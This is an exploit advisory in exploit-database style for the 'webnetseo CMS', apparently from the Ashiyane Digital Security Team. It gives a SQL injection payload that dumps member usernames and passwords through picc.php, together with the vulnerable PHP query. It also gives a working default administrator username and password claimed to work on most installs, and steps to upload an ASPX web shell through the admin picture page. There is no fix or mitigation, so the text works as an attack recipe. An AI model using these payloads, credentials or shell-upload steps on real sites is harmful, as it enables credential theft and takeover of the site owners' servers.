########################################################### # Exploit Title : webnetseo CMS Multiple Vulnerabilities # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage: webnetseo.net # Date : 2017 07 May # Category : WebApp # MY HOME : Ashiyane.org # CWE : CWE-89 - CWE-276 And ... # Video : https://www.youtube.com/watch?v=dZLDPYJeLSw ########################################################### webnetseo CMS Multiple Vulnerabilities 1-SQL INJECTION 2-Default Account 3-Upload shell - ASPX Research by Ashiyane Digital Security Team ########################################################### 1-SQL INJECTION Some sql Vulnerability location /picc.php?id= Localhost://picc.php?id=-[inputSQL]+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from+member--+/ source Vulnerability files : Picc.php $id=$_GET["id"]; $id2=$_GET["id2"]; $id3=$_GET["id3"]; $strQuery = "SELECT * FROM pic where id > '$id' && class_id='$id3' order by id asc"; $db->query($strQuery); if($db->next_record()){ echo '<a href="picc.php?id='.$db->f("id").'&id3='.f("class_id").'" style="font-size:12px; font-weight:normal; " >'.$db->f("title").'</a>'; }else{ echo "?"; } ?></td> </tr> ########################################################### 2-Default Account 90% sites Default Account Default Account USER : yxy746380 PASS : 746380 ########################################################### 3-Upload shell - ASPX go to TARGET.COM/admin/pic.php?id=2 upload ASPX And ASP shell shell location : TARGET.COM/images/upload_file/[RandonName.aspx] finishd ################################################ # Discovered By : Hassan Shakeri # Twitter : @ShakeriHassan - Fb.com/General.BlackHat - Me@Seravo.ir ###########################################################